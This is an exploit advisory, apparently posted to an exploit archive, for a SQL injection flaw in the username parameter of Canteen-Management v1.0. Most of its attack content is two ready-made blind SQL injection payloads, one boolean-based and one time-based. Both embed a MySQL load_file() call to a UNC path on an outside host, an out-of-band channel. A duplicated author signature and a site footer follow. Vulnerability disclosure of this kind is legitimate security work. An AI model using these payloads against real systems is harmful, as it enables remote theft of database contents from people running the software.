Canteen-Management v1.0 Exploit, SQL Injection

## Exploit Title: Canteen-Management v1.0 - SQL Injection
## Exploit Author: nu11secur1ty
## Date: 10.04.2022
## Vendor: https://www.mayurik.com/
## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true
## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi

## Description:
The username parameter from Canteen-Management1.0-2022 appears to be
vulnerable to SQL injection attacks.
The malicious user can attack remotely this system by using this
vulnerability to steal all information from the database of this
system.

STATUS: HIGH Vulnerability

[+]Payload:

```mysql
---
Parameter: username (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT)
    Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login=

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: username=UvIiDwEB'+(select
load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+''
AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND
'awEr'='awEr&password=h5F!l8j!Y6&login=
---
```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi)

## Proof and Exploit:
[href](https://streamable.com/vvz2lh)


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at
https://packetstormsecurity.com/https://cve.mitre.org/index.html and
https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>


--
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>

All rights reserved nPulse.net 2009 - 2024
Powered by: MVCP 2.0-RC / BVCP / ASPF-MILTER / PHP 7.4 / NGINX / FreeBSD